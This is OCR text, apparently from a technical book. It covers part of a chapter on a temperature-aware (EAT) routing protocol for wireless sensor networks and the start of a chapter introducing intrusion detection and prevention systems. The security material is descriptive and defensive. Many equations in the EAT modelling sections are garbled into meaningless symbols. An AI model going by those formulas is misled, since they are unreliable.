Aware Thermal (EAT) Routing Protocol has been developed. It consists of 
potential fields like energy, environment and quality of service. The energy 
field ensures that the sensor nodes select neighbor nodes with more energy 
as relay nodes. The environmental field makes sure that the estimated rout- 
ing path finds an alternative routing path as the sensor node temperature 
increases beyond the threshold limit. The quality of service field makes the 
data reach the destination successfully from the source. The routing path 
is estimated once the above-mentioned potential fields are satisfied. The 
major contributions of EAT protocol are summarized as follows. 


1. Improved routing possibilities under critical temperature zone: 
Based on the acquired data from environment, the EAT 
routing protocols can identify an additional routing path to 
avoid the critical temperature zone. 

2. QoS field: To improve the quality of service, the data are 
assigned with three different priorities (normal, abnormal 
and critical). This protocol ensures that the critical data will 
reach the destination node without any delay. 

3. Energy field: This protocol measures the available remain- 
ing energy within the network. Ifa node wants to choose an 
alternative path due to high temperature zone, then routing 
path with high energy nodes are selected. Similarly, the relay 
node with high energy is selected for long-distance data 
transmission. 


The remainder of this chapter is organized as follows: conventional 
protocols on node disjoint, partially disjoint protocols and temperature 
influence on different applications are reviewed in Section 6.4. In Section 
6.5, the implementation of Environmental Aware Thermal (EAT) Routing 
Protocol, assumption and flow chart is illustrated. Section 6.6 highlights the 
simulation parameters utilized. Section 6.7 discusses the results obtained 
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from simulation and analyzes the environmental impact on a WSN. Finally 
in Section 6.8 the conclusion is presented. 


6.4 Related Works 


The multipath routing protocols are designed to provide reliability and 
energy efficiency in a WSN. The protocols are classified into two types 
based on node path disjointness such as node disjoint and partially disjoint. 

In node disjoint protocol, there is no single common node in any dis- 
covered routing paths. In case of node failure, data transmission through 
that particular route is interrupted. This protocol guarantees that other 
constructed paths are not affected. The different node disjoint protocols 
are as follows: In N-to-1 multipath protocol [8] the routes are updated 
periodically at the end of discovery process or based on the demand from 
base station. A hybrid multipath approach is introduced for reliable and 
secured data collection. The information at the source is split into multiple 
data using secret sharing scheme. The divided data travels along the mul- 
tiple path for concurrent delivery. The reliability of packet is increased due 
to an alternate path packet salvaging strategy. This protocol is resistant to 
collusive attack and link failure of nodes. HSPREAD [9] is an extension 
of N-to-1 multipath routing protocol. It is used to find the nodes being 
disjointed from BS in a single route discovery process, following which a 
hybrid multipath data collection approach was proposed. In this method 
an alternative routing path is determined for every individual packet and 
is combined with concurrent multipath dispersion to obtain concurrent 
route for end-to-end data collection. Additionally, this scheme improves 
the security of end-to-end data delivery by combining multipath data 
dispersion and secret sharing mechanism. The multipath route discovery 
operation is similar to N-to-1 multipath routing protocol. Hence energy 
efficiency is found to be a major drawback in this protocol. The authors in 
[10] proposed DCHT protocol based on node disjoint multipath routing 
protocol. In this scheme, multipath routing path is established by direct 
diffusion process. This process strengthens the multiple path by provid- 
ing minimum latency and high quality link. The quality of any established 
path is judged by interference strength and data transmission latency. As 
the interference strength is dynamic in WSN, more network resources are 
required for routing in DCHT. Thus the disjoint paths with less interfer- 
ence and path cost are selected. In Efficient and collision aware (EECA) 
node-disjoint multipath routing algorithm (EECA) [11], two collision-free 
routing paths are estimated based on node position information. These two 
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paths are established using power and constrained adjusted flooding mech- 
anism. The data are transmitted with minimum power. The EECA protocol 
is limited within the neighbor nodes in the discovered route. Additionally, 
collision between the established two routing paths is achieved utilizing 
the broadcast nature of wireless communication. However, the multipath 
interference is reduced in routing protocol. In Geographic node-disjoint 
path routing protocol (GNPR) [12], two routing schemes based on direc- 
tion and distance are established. These metric schemes are incorporated 
in greedy routing (GR) and compass routing (CR). The data packets are 
forwarded to the neighboring nodes with a smallest angle to reach the 
destination in CR. Similarly, the node transmits data packet to neighbor 
present near the destination in the space in GR. It performs better in terms 
of delay. In Pairwise directional geographical routing protocol (PWDGR) 
[13] the pairwise nodes are selected which are 360° around the sink. The 
routes are established in the following manner: source-pairwise-sink. This 
connection provides a balanced traffic in the network and avoids hot spot 
issue by uniformly selecting the nodes for routing path. The GPS module 
can be integrated into sensor nodes in PWDGR to find the location but the 
cost becomes high in large-scale deployment. In Minimum Energy Cost 
Aggregation Tree (MCEAT) algorithm [14], multipath node disjoint prob- 
lem is considered as Steiner tree problem and the solution is determined 
through genetic algorithm. The main objectives of these optimization algo- 
rithms are reliability, transmission delay and energy. In this algorithm two 
factors are considered, one with relay node and other without relay node. 
The solution for without relay node problem is obtained using 2 approx- 
imation algorithm and for networks with relay node is determined using 
O(1) approximation algorithm. Since the Steiner tree problem is NP hard, 
this approach is efficient only for small-scale deployment areas. 

The node disjoint routing protocol provides several advantages such as 
reliability. This algorithm finds it difficult to estimate several paths between 
source and sink in case of sparse deployment. Besides, this protocol requires 
frequent updating of information about the neighboring nodes, resulting in 
larger routing overhead. Thus partially disjoint multipath routing protocols 
are formed which is similar to node disjoint protocol, the partially disjoint 
multipath routing can also incorporate multiple shared nodes and a single 
node failure interrupts all the other alternate paths including the failure node. 
The various partially disjoint multipath routing protocol are described below. 

Security Aware Ad hoc Routing protocol (SAR) [15] is a first partially 
disjoint multipath routing protocol. In this protocol the routing decisions 
are made by considering the following factors, namely QoS parameters, 
priority of data packets and energy conservation. This protocol utilizes 
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a table driven multipath approach to provide fault to tolerance, energy 
consumption and QoS parameters. SAR provides quality of protection to 
all the data packets flowing through this protocol. Thus the routing over- 
head maintenance is overwhelming. Reliable Information Forwarding 
(ReInForM) routing protocol [16] transmits multiple copies of data 
packets through multiple paths from to source to sink with the desired 
reliability. Dynamic packet is created to minimize the number of paths 
required for reliability. This is done through topology and channel error 
rates. ReInForM utilizes all desired path with uniform and efficient load 
balancing. The routing mechanism implemented in this protocol is costly 
due to frequent information exchange of neighboring nodes. In State Free 
Gradient-Based Forwarding Protocol (SGF) [17], the sensor nodes do not 
maintain routing table in which the information about neighboring nodes 
or network topology is not maintained. Hence this protocol remains suit- 
able for large networks. Instead of routing table, SFG constructs a cost field 
called gradient. This gradient directs each data packet to proper routing 
path. The entire gradient mechanism is maintained by data transmission 
with little overhead. To adapt to topology variations, the forwarder node 
is selected through distributed contention process from multiple nodes. 
This protocol provides less delay with increased packet delivery. Energy- 
Balanced Routing Protocol (EBRP) [18] approach is constructed by com- 
bining virtual potential field and the concepts of potential in physics. The 
virtual potential field consists of depth energy and residual energy. In this 
protocol the data are forwarded through the nodes with high residual 
energy. The routing loop problems are eliminated by using loop elimina- 
tion algorithm and basic algorithm. This algorithm improves energy bal- 
ance, increased network lifetime and throughput. 

In addition to the above routing protocol a few researchers have analyzed 
the impact of surrounding temperature in an environment with the follow- 
ing results. The area of monitoring on off-site region depends on the position 
of electronic nose which is a part of the WSN system [19]. The node located 
beyond the landfill region does not monitor continuously, but it acts as a sen- 
sor when activated at particular conditions, both inside and outside the land- 
fill are obtained. Additionally, a WSN is organized based on the energy aware 
approach to increase the lifetime of entire system with benefits in terms of 
cost and better advancements in monitoring structure. In this work [20] a 
heuristic algorithm is designed and reference architecture that aids the deci- 
sion of anomaly detection depends on the demands of agricultural environ- 
ments are utilized. The author had performed a preliminary evaluation and 
analyzed different anomaly detection algorithms in terms of scalability met- 
rics, execution time and accuracy. From the obtained results it was inferred 
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that the power consumption is reduced by 18.59% and lessens the tempera- 
ture of the device by 15.94%. The obtained values are completely dependent 
on edge device characteristics and the application workload. The sensors are 
placed in different environments to collect various data such as humidity, 
light, temperature, etc. [21]. Though it is useful to collect different data, it is 
still a prominent issue to infer the impact of environmental conditions on 
data collection in terms of accuracy and prolonged network lifetime. Hence 
an optimized dictionary updating learning-based compressed data collec- 
tion algorithm (ODUL-CDC) is developed to degrade the influence of envi- 
ronmental noise on the accuracy of WSNs data collection and to increase the 
life time of sensor node. The main purpose of using the dictionary learning 
method is to get a sparse dictionary, which is obtained by learning from the 
training data. Henceforth the main purpose of introducing the self-coher- 
ence penalty term is to reduce the over fitting of the training data during the 
dictionary updating process. Before installation of sensor nodes, it is import- 
ant to determine the total cost required to complete the entire set up [22]. A 
sensor network is designed with an operating frequency of 920 MHz band 
to measure the quantities like atmospheric pressure, dust, temperature and 
relative humidity, etc. The system is developed based on LoRa networks and 
the above-mentioned parameters are measured in the actual environment of 
Kamihama campus at Mie University. From the results it is observed that the 
temporal and spatial characteristics of measured quantity are determined for 
proper positioning of end devices in LPWAN-based WSN. 

Thus from the above discussion it is clear that only few researches were 
carried out by considering the impact of temperature on sensor nodes. But 
in routing protocol design the influence of temperature variations in the 
environment is not included. Hence due to low-cost implementation and 
large-scale deployment the effect of environmental factors on WSN can- 
not be neglected practically. Thus EAT routing protocols are designed to 
consider the influence of environmental temperature on performance of 
sensor nodes. 


6.5 Proposed Environmental Aware Thermal (EAT) 
Routing Protocol 


In EAT routing protocol, the environmental influence on a particular net- 
work and its effects are estimated. The effects are observed for lifetime, data 
delivery delay, device performance, and network efficiency during critical 
periods. Fig. 6.7 shows the operation of EAT protocol. 
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Fig. 6.7 Environmental aware thermal (EAT) routing protocol. 
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** In the initialization phase, source initiates the broadcast to 
gather information from intermediate nodes like hop dis- 
tance, temperature and energy from source to destination. 

«* The neighboring node starts calculating the temperature 
and remaining energy. If the temperature of the node is 
found to be less than the threshold value (Node_temp<'Th 
_min), the packet is passed to the next intermediate node 
for further processing or else the data packets are discarded. 
Likewise, the remaining available energy is also calculated. 
If the node’s energy is high, then the packet is forwarded to 
the neighboring node. 

«* If both temperature and energy conditions are satisfied, the 
node calculates the distance between source and destina- 
tion. A connection is established through a path with min- 
imum hop count. If the distance is too long, then the node 
will choose a relay node to reach the destination. 

** Once the connection is established, the sensor nodes are 
ready to transmit the packets to the destination. Before 
data transmission, the packets are categorized into normal, 
abnormal and critical priority levels. 

«* After assigning priority, the protocol checks the surround- 
ing temperature. If it is above the threshold value (Node_ 
Etemp>Th_max), then the packets are retransmitted to 
source to choose an alternative path. Next, the node’s tem- 
perature is calculated. If temperature of sensor node is 
greater than the threshold value (Node_temp>Th_max), the 
sensor node forwards only critical data signals; otherwise all 
priority signals are transmitted. 


6.5.1 Sensor Node Environmental Modeling and Analysis 


The influence of temperature on sensor node and its effects on the data 
transmission, delay and energy consumption is observed. However, in the 
atmosphere there are many environmental factors like humidity, moisture, 
electromagnetic interference and temperatures that influence the sensor 
node's performance. From the above-mentioned parameter, temperature 
is one of the most influencing factors which degrades the performance of 
the sensor node. In this paper, environmental temperature influence on 
sensor node is focused. Thus, single node environmental influence and 
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multi-node environmental influence is developed to analyze the influence 
of temperature on sensor nodes. 


6.5.2 Single Node Environmental Influence Modeling 


The threshold temperature is fixed for each sensor node to identify the 
surrounding temperature around the single node. The threshold value is 
fixed based on surrounding temperature for best operation. Each node 
continuously senses the surrounding temperature. If the surrounding 
temperature is minimum and below the threshold value (-10 °C to 10 
°C) the values are calculated using Eq. 6.1. If the node is deployed in 
normal environmental temperature field of 10 °C to 80 °C, the influence 
on external environmental influence is set to be 1 as given in Eq. 6.2. At 
this point, the temperature influence is considered as negligible. If the 
temperature exceeds maximum threshold value, then Eq. 6.3 is used to 
calculate the field temperature. 


Te (n) = NoT*(n) <Tiow (6.1) 
E@=l esl Wsty (6.2) 
T,(n)=N{T*(n)= Ta (6.3) 


Where T‘(n) is a single node surrounding environmental tem- 
perature field Tey lich are defined as the sensor normal operation at k 
environmental factor. T*,,,T«,, is the sensor node operating threshold 


set point. T*(m) is temperature of individual node at k environmental 


T*(n)- Ti, 
factor. Nk =~" —™"_ for low environmental temperature field and 
0 T k Tk Pp 
low ~ 4min 
¢— Tae T(n) . 
N‘k= ea is defined for high environmental temperature field. If 
max ~ *high 


the data is transmitted through a node (n) and T*() changes to the state 
1. It indicates that the temperature of a particular node increases. At this 
stage the protocol verifies the T*,. value. If the condition is satisfied, data 
transmission is terminated through that particular node. 
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6.5.3 Multiple Node Modeling 


The data packets are transmitted through multiple nodes to reach their 
destination. Therefore, multiple node temperature modeling is essential 
to understand the complete influence of environmental effect on sensor 
nodes. Due to the environmental factor, the lifetime of sensor node, energy 
of particular node and data losses of the node are being affected. To analyze 
the environmental temperature T’ (1) influence on sensor node the follow- 
ing Eq. 6.4 is used. 


Tin (N) = Tinin (Te (11) TE (02), TE (13) ye eeeseeeeneeTe(n)} (6.4) 


Where T (1) is a single node surrounding temperature created by node 
(n) at k factor. In a real-time environment, multiple factors like humidity, 
moisture and electromagnetic interference, etc., influence the node perfor- 
mance. In this study only temperature is taken into consideration. The path 
selection is done based on single node surrounding temperature value. To 
ensure continuous working of sensor nodes two threshold values, T.. and 
T. are fixed. If the temperature of sensor node increases beyond T._, , that 
specified node area is called as “unsafe zone” and this node is not selected 
for further communication purpose. This “unsafe zone” data is collected 
by neighboring node and the same node is continuously monitored until it 
returns to normal temperature. It is given in Eq. 6.5. 


T. (14, p) = Koy) Tyg (Ms Typ (P) (6.5) 


(n, p) ~ min min 


Where T. (n, p) is the neighboring field temperature potential of node 
(n) and node (p). 


6.5.4 Sensor Node Surrounding Temperature Field 


The total environmental temperature of a particular sensor node (n) is 
defined by combining the multiple node environment T, (n) and neigh- 
boring field environment T. (n, p). It is given in Eq. 6.6. 


Tn(n)+T.(n, p) 


(6.6) 
1+ kin,p) 


Ton (1) = 


Where t (n) is environment of particular sensor node, K, s environ- 
mental factor at node (n) and node (p). 


EAT ROUTING PROTOCOL FOR WIRELESS SENSOR NETWORKS 107 


6.5.5 Sensor Node Remaining Energy Calculation 


To ensure continuous operation of sensor node, remaining energy calcula- 
tion is very important. The remaining energy (E, (n)) of particular node is 
calculated using Eq. 6.7. 


E,(n,t) 
E;(n) 


Eng (n)= (6.7) 


Where Eis the remaining available energy of node (n) at the time of 
(t), E.(n) is the initial energy available while deploying the sensor node (n). 
Utilizing Eq. 6.7 the remaining energy of a particular node at time (t) can 
be determined. But the required energy for sensor operation is calculated 
using Eq. 6.8. 


PB 
T,(n) = in ss 1) + Ee + nP.x a Pa + Pyp + 2 Prrrequency startup (6.8) 


r 


Where P. denotes the node receiving operation, P,. performs data 
transmission, P, , indicates node in idle state, P,, is the nodes in sleep state, 
‘frequency startup #8 the radio frequency startup power during transmission, P, 
and T is the data and transmission rate of packets. In a network, all nodes 
perform many operations like sensing, transmission, receiving, sleep and 
idle stage. Each stage of sensor operation consumes a different energy level 
from the battery. 


6.5.6 Delay Modeling 


The data being transferred from source to destination will undergo dif- 
ferent delays along its desired path. The types of delay include processing 
delay, queuing delay and sensing delay. The processing delay arises during 
data transmission from one node to another node. Queuing delay is due to 
the nodes transmitting previous data packets. The sensing delay is with the 
initialization of nodes for data transmission. Moreover, transmission delay 
occurs while sending the data, and reception delay is during data reception 
at each node. 


D,(n)= (Dyn + Dors + Dgu + Dix(n) + Dx(n))+ Liw Ri (6.9) 
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Where D,, is sum of delay, D,, is sensing process delay, D,,, is process 
delay, D,,, is queuing delay, D,, is transmission delay, D,, is receiving delay 


and }’,, Rj is relay node processing delay. 


6.6 Simulation Parameters 


The EAT protocol are simulated using MATLAB. The sensors are assumed 
to be deployed within an area of 250 x 250 m. The total number of sen- 
sor nodes used is around 100 and the range is set to 50 m from source 
to destination. The ambient temperature is kept at 40°C. The minimum 
and maximum operating temperature is around 10°C and 80°C. In the 
simulation model, the node’s position is fixed and has the same transmis- 
sion range. The specific heat of the node is fixed as constant value. The 
node gets cooled down at the rest state of the sensor node. The multi-hop 
network model is prepared. During installation, all nodes are placed at 
uniform distance with equal energy. The simulation parameters used are 
shown in Table 6.1. 


Table 6.1 Simulation parameters for environmental 
influence on sensor nodes. 


50 nJ/bit 
Cooling rate at rest position 
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6.7 Results and Discussion 


In this section, the influence of temperature on networks, amount of power 
consumed, sensor network lifetime at three different cases and variation of 
delay at different temperature are discussed. 


6.7.1 Temperature Influence on Network 


The sensor network performance degrades and its malfunction probability 
also increases sharply at low and high temperature. If the node operates 
at normal environmental temperature, then the effect caused due to sur- 
rounding temperature on the network can be taken as negligible. Fig. 6.8 
shows the temperature influence on sensor nodes at three different cases. 
In case 1, normal operation (no temperature influence) is considered. 
Here, the sensor node operates at nominal temperature interval and does 
not consider the influence of temperature on sensor performance. In case 
2, the factors influencing the sensor node at different environment field 
are considered. As the surrounding environmental temperature increases, 
the sensor node temperature rises linearly at a time interval t. In case 3, 
the temperature variation of sensor nodes along the routing path due to 
continuous variation in environmental temperature is analyzed. 


6.7.2 Power Consumption 


The total amount of power consumed is determined by taking the differ- 
ence between initial energy and the remaining energy. The environmental 


Change in Temperature (c) 


Time (s) 


Fig. 6.8 Temperature variation of sensor node at different time. 
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Avg. power consumption 


Rate 


Fig. 6.9 Average power consumption for different data rate. 


field ensures that the constructed multipath does not utilize the sensor 
node whose temperature is beyond the maximum threshold limit. The QoS 
field takes care of successful delivery of packets to sink. The energy field 
helps to select an intermediate with high residual energy to involve in the 
next hop of data transmission. Fig. 6.9 illustrates the average power con- 
sumption of different data rate for case 1 to 3. From the obtained results, it 
is observed that the amount of power consumed is less in case 1 and case 
2. In case 3 energy increases with data rate. Thus a large amount of power 
is consumed in case 3, thereby reducing the node lifetime considerably. 
Furthermore, the routing decisions get affected due to residual energy and 
the data avoid passing through the node with lesser energy. 


6.7.3 Lifetime Analysis 


Fig. 6.10 shows the lifetime analysis at different cases. In case 1, the sensor 
node works for longer duration compared to other two cases. In case 2 
condition, the nodes are influenced by environmental temperature which 
causes fast discharging of available energy in the battery. If the discharging 
rate of battery power increases, then the total lifetime of the sensor node 
gets decreased. In case 3, due to rerouting process the sensor spends more 
energy for transmitting the data to long distance. As the transmission dis- 
tance increases, the energy consumption will also remain high. Likewise, if 
the packet size increases then the energy consumption also increases. Thus 
the lifetime of sensor node gets reduced in case 3. Moreover, the improper 
energy calculation of sensor node during route node selection results in 
rapid death of sensor nodes within the network. 
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Fig. 6.10 Lifetime analysis for all three cases. 


6.7.4 Delay Analysis 


The delay modeling is performed at all the three cases and the corre- 
sponding result (delay vs. temperature) is shown in Fig. 6.11. The delay is 
measured based on the number of packet reaches within a specified time 
interval. From the graph, it is observed that the delay is minimum in case 1 
as the transmitted data packets reach the destination through the shortest 
path. So all nodes perform data transmission with minimum delay. In case 
2, the delay is high due to external temperature influence on a particu- 
lar sensor node. This results in the limited operation of the node. At this 
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Fig. 6.11 Delivery delay analysis over temperature. 
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condition, the data packet transmission will be stopped and the neighbor- 
ing nodes will update the current temperature value of the affected node. 
Likewise, in case 3 the sender node will completely reroute to the next 
shortest path. As the transmission range increases, the delay gets increased 
during delivery of data to destination node. 


6.8 Conclusion 


WSNs are deployed in unattended areas and are provided with minimum 
energy for operation, which affects the network’s performance and life- 
time. Thus Environmental Aware Thermal (EAT) routing protocol was 
proposed. This protocol mainly concentrated on the effect of surrounding 
environmental temperature and selects an optimum routing path accord- 
ingly. Temperature, delay, lifetime and power consumption of sensor nodes 
at three different cases are analyzed. From the obtained results, it was 
inferred that case 1 results have efficient QoS and increased network life- 
time at normal environmental temperature. In case 2, as the temperature 
increases, the delay gets increased and network lifetime becomes minimum 
for a single sensor node. In case 3, a fully established sensor network was 
considered. In this case, the environmental temperature influence on the 
QoS, lifetime, and temperature of sensor nodes was observed. Therefore, 
the effect of environmental conditions on the performance of sensor node 
was analyzed. In future, other environmental factors like humidity, rain 
and moisture influence on EAT protocols need to be evaluated to analyze 
the effectiveness of the entire network operation. Also, the real-time imple- 
mentation of sensors and its corresponding data can be examined. 
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Abstract 

A computer network is simply an interconnection of several computers that follow 
common communication protocols. As network intrusion has been increasingly 
affecting organizational systems and crucial data, it is imperative that there exists 
an effective network security system in place. This is where the role of a sound 
intrusion detection system becomes important in an era where attempts at unau- 
thorized access have become the norm rather than the exception. Such a system 
helps to keep malicious traffic at a distance and protects the computer network 
from a variety of threats. In this chapter, a study has been done in order to under- 
stand the system of an Intrusion Detection and Prevension System (IDPS), which 
not only helps detecting an ongoing intrusion, but also helps prevent it for future 
cases. Its functioning and comparison between the two divisions. Towards the end, 
an attempt has been made to enlist the administrator's functions towards ensuring 
the security of the computer network and understand what current challenges are 
being faced by the researchers and how they have tried to solve it. 
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7.1 Introduction 


7.1.1 Intrusion and Detection 


An intrusion can be defined as an attempt to compromise the computer 
security policies, ie., Confidentiality, Integrity and, Availability (CIA) or 
an effort at bypassing the mechanisms enforced in a network for security 
[1]. 

In 1980, the concept of Intrusion Detection was introduced by James 
Anderson, who proposed that a threat has the potential to access or manip- 
ulate information in an unauthorized manner. Intrusion Detection is 
the process that combines both the monitoring as well as the analysis of 
events in a computer network or system. Therefore, an Intrusion Detection 
System acts as a detector before information systems, deciding whether its 
monitored events are legitimate or symptomatic of an attack [2]. This is 
especially important in the case of wireless networks as wireless networks, 
as opposed to wired networks, are even more susceptible to attacks [3]. The 
model is presented below in Figure 7.1. 


7.1.2 Some Basic Definitions 


i. Threat: The potential likelihood of an intentional and 
unauthorized attempt towards: 


(a) Acquiring details 
(b) Modifying and manipulating information 
(c) Making a system vulnerable and unworkable [4] 


Intrusion 
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Security Audit 
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Monitoring 
System 


Alarm 
or 
Report 


Data 
Collection 


Data Intrusion 
Pre-processing Recognition 


Figure 7.1 Intrusion detection working. 
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ii, Risk: When the information is exposed accidentally or 
impairment of hardware occurs or the software design is 
faulty, the system is said to be at risk. 

iii. Attack: When the attacker executes his plan of working 
out the threat, it is called an attack. 

iv. Penetration: An attack that succeeds in the unauthorized 
acquisition of files and programs of a computer system is 
called penetration. 


7.1.3 Intrusion Detection and Prevention System 


An Intrusion Detection System (IDS) is a method for monitoring any 
activity carried out by persons or computers which is deemed to be unau- 
thorized in nature [5]. These attempts could be intended to enter the com- 
puter system or might have secured actual access, sometime in the process. 
Possible incidents are identified and information about them is logged. 
An IPS or Intrusion Prevention System, on the other hand, is entrusted 
with preventing threats. Figures 7.2 (i) and 7.2 (ii) compare IDS and IPS, 
respectively. 

The Intrusion Detection and Prevention System (IDPS), having vested 
with an added prevention element, focuses on the attempts at stopping 
intrusions and reporting them to the system administrators. Thus, IDPS 
has the best of both worlds, IDS as well as IPS. Besides the usual function- 
ing, organizations are known to utilize the IDPSs for checking the effec- 
tiveness of their security policies and documenting the threats at hand. 

The IDPS differs from the IDS in that it also attempts to prevent the 
attack or detected threat from succeeding. Thus, the IDPS picks off from 


(i) (ii) 


Figure 7.2 (i) IDS, and (ii) IPS. 
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where the IDS has left off. As network and security threats continue to show 
an alarming rise, the interest of researchers in this field has increased man- 
ifold. Almost every organization, irrespective of its sector, needs to have 
such a system in place to strengthen its security infrastructure. Throughout 
this chapter, both these terms have been used according to the context. 


7.1.4 Need for IDPS: More Than Ever 


The dependence of organizations big and small, civil and corporate societ- 
ies, public and private agencies, and countries on computer networks has 
reached great heights. The threat to those networks comes not just from 
external breaches; even insiders are known to abuse their privileges. Any 
such violation causing intended or unintended access, if gone unchecked, 
can lead to disastrous consequences for the network as a whole. If that 
is the case, the security of computer networks and therefore the secu- 
rity of the enormous quantities of data stored on them will be compro- 
mised. Therefore, risk management measures are of immense importance 
since they secure the IT systems and data that support the organizations’ 
missions. 

Statistics from Computer Emergency Response Team (CERT) show 
that the amount of such intrusions has been increasing dramatically with 
each passing year. As such, an efficient system to counter the challenges 
and reduce the vulnerability of network systems is indispensable. A strong 
security system enhances operational effectiveness and minimizes strate- 
gic and legal risks [6]. The Intrusion Detection and Prevention Systems, 
therefore, refer to both the hardware as well as the software that have auto- 
mated the process of intrusion detection. 


7.1.5 Introduction to Alarms 


When an attack on a system has been identified, one of the first responses 
of an IDPS is to generate a signal as a form of an alert. Such a signal when 
generated is said to be an alarm. This signal is significant to get the admin- 
istrator acquainted with the new event. There are four types of signals or 
alarms. In any event, one of the following alarms would be generated [7]: 


i. True Positive: Whenever there is an attack and the 
Intrusion Detection System is able to identify it while trig- 
gering an alarm, it is called the case of True Positive. 

ii. False Positive: Whenever the Intrusion Detection System 
produces an alarm but there is no attack, this is known as 


iii. 


iv. 
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the case of False Positive. The anomaly-based methodol- 
ogy is overpowered by false positive alarms. 

True Negative: This is the case when no attack happens, 
and corresponding to it, no alarm is generated by the 
system. 

False Negative: This case is said to have occurred when the 
attack had taken place, but no alarm was generated. The 
anomaly-based methodology displays the highest num- 
ber of false negatives when compared to signature-based 
method. 
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There is a massive quantity of alarms that are generated from the intru- 
sion detection systems. It becomes truly a cumbersome task to analyse all 
of them. The onus is on the network system administrators. This certainly 
means that there is always a possibility of overlooking some important 
alerts, which could cost the system dearly [8]. Often it becomes difficult to 
analyse what is happening to the system as a whole. New technologies in 
the field are aimed to provide a working solution to effectively tackle the 
huge quantity of signals generated. 


7.1.6 Components of an IDPS 


i. 


ii. 


iii. 


Sensor: The sensor in an IDPS can sense threats by effi- 
ciently monitoring the networks. The range of operation of 
these sensors covers not just network-based technologies 
but also the wireless and NBA-based technologies. In the 
case of host-based intrusion detection technologies, there 
is an “agent”, which is the functional equivalent of a sensor. 
Console: There is a need for an interface that could pro- 
vide the necessary link between the administrators and the 
intrusion detection systems. The console serves this pur- 
pose. They are most suitable for sensors’ configuration. It 
is the user interface that allows the user to interact with 
the intrusion detection system [9]. Many of these sensors 
also perform software update activities in addition to their 
tracking and monitoring jobs. 

Management server: These are mostly used in large-scale 
firms. Available in software and appliance formats, the 
server is the device to which the alerts and information 
are sent. This central device acts as the platform where the 
information deposited through alarms and alerts is stored. 
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Figure 7.3 A typical IDPS Architecture. 


Therefore, attacks against the management server can be 
the most troublesome issues [10]. 

iv. Database server: The database server helps to have a repos- 
itory of the alerts. The information herein can be periodi- 
cally fed by the alarms as well as the management server. A 
huge compilation of records about network intrusion and 
allied events are kept here. 


The block diagram in Figure 7.3 gives the architecture of a typical IDPS. 


7.2 Configuring IDPS 


7.2.1 Network Architecture of IDPS 


The components of an IDPS can be connected through a common network 
that is the standard network of the organization. Such a network is called 
by different names, one of which is the production network. Alternatively, 
a totally different network can also be used. This second type of network 
is separately carved out for the management of various security and mon- 
itoring applications that are running all the time. If the latter is the case, it 
is said to be a management network [11]. 

This establishment means that the production and management net- 
works have been separated from each other, aiming towards no interference 
of any sort. To a management network, the management servers, database 
servers, and consoles are linked. This is very effective as it provides a mech- 
anism of concealment such that the underlying Intrusion Detection and 
Prevention System remains safe and secure to the extent possible. 
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Now that there has been a discussion about the rosy side with multiple 
advantages of this architecture, there is a need to know the challenges as 
well. First and foremost is the cost factor. Just as a totally different network 
is placed as a separate entity, we increase the cost of procuring the network- 
ing equipment and other hardware. For instance: Personal Computers for 
the consoles [12]. A look at the effectiveness of the system and the cost of 
its positioning is important to assess the cost-benefit trade-off of employ- 
ing the system. On top of it, there is a need for challenges for the network 
systems’ administrators who are now required to work with separate com- 
puters earmarked for monitoring and management of the IDPS. 


7.2.2 A Glance at Common Types 


The range or scope of their monitoring and their deployment determines 
the types of Intrusion Detection and Prevention Systems. Though there are 
roughly two divisions of IDS, viz., the Network-based (NIDS) and Host- 
based (HIDS), there remain quite a number of ways to classify and include 
some other divisions. In this chapter, they are divided into the following 
four types on the basis of their deployment and the types of events they 
detect: 


i. Network-based: The network-based intrusion detection 
and prevention systems monitor traffic in the network for 
some specific network segments and devices. This type of 
technology keeps track of suspicious activities by analys- 
ing the network and application protocol activity [13]. 

iii NBA: The Network Behaviour Analysis is that type that 
keeps a tab on the unusual flow of traffic. Such detection 
technologies are capable of examining not just malware but 
policy violations as well. These are very effective in moni- 
toring the DDoS type attacks. DDoS refers to Distributed 
Denial of Service. An NBA system typically works with 
sensors and consoles and less frequently, the management 
servers in addition. 

iii. Wireless: The wireless systems are those systems that 
examine and monitor unusual instances in the wireless 
protocols. Sometimes it is argued that the building of an 
IDPS in a wireless environment can be more challenging 
than in wired ones owing to certain practical connectiv- 
ity issues [14]. The components are similar to a network- 
based IDPS. 


122 WIRELESS COMMUNICATION SECURITY 


Firewall 


Web Mail Web DNS 
Server Server Server 
iil NIDS 
Figure 7.4 NIDS. 
Firewall 
HIDS HIDS = = 
Web Mail Web DNS 
Server Server Server 
r dl Zz 
HIDS HIDS HIDS HIDS 


Figure 7.5 HIDS. 


iv. 
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Host-based: These IDPSs are different in the sense that a 
single host is monitored thoroughly. Any suspicious activ- 
ity that takes place within that host comes under the pur- 
view of a host-based IDPS. This can keep an eye on system 
logs, network traffic- both wireless and wired confined 
to that particular host, file access, and a range of other 
domains. 
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A detailed insight into Network-based IDS and Host-based IDS is dis- 
cussed in the following section. Figure 7.4 and Figure 7.5 give a basic struc- 
ture of NIDS and HIDS, respectively. 


ee 


Femadolal 


Network-Based IDS 


Network Architecture 


The network communications are provided by the TCP/IP layers. The data 
across the network is passed through these layers beginning from the high- 
est layer to the lowest layer. Afterward, the lowest layer passes the data to 
the physical network. These are the four layers: 


i. 


iil. 


Application layer: In this layer, application data is gen- 
erated through hundreds of application layer protocols. 
Some of these protocols are Hypertext Transfer Protocol 
or HTTP, Simple Mail Transfer Protocol or SMTP, File 
Transfer Protocol or FTP, Domain Name System or DNS, 
and Simple Network Management Protocol or SNMP. The 
data at this stage is sent to the transport layer. 

Transport layer: This layer helps in the reliable delivery of 
the application layer services to networks by either TCP 
or UDP protocols. Transmission Control Protocol or TCP 
and User Datagram Protocol or UDP are the generally 
employed protocols at the transport layer. 

Network layer: The data received from the Transport layer 
is managed and routed here. Data is transported in units 
known as “packets” which have information about the IP 
Version, IP protocol number, and IP addresses of source 
and destination. This layer is also known as the Internet 
Protocol layer. 

Hardware layer: This layer is responsible for linking the 
hardware components of the network. Thus, it is here that 
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switches, cables, and routers are involved. The common 
protocol used is Ethernet. 


7.2.2.1.2 Data Collection and Detection Capabilities 

Some network-based IDSs first go for information gathering. As part of 
this, they collect information on hosts, operating systems, and applications. 
This helps them to identify potentially vulnerable hosts and applications. 
Machine learning and data mining in NIDS are being applied extensively 
to decode behaviour patterns [15]. 

Data fields like transport, network and application layer protocols, 
source and destination of ports, timestamp containing date and time, type 
of alert, IP addresses of source and destination are logged on a large scale. 

This massive logging helps the network-based IDS to check the authen- 
ticity of alerts and correlate the events when they occur the very next time. 
Network-based IDSs provide a wide range of detections. Signature and 
anomaly-based methods and their combinations are employed. The detec- 
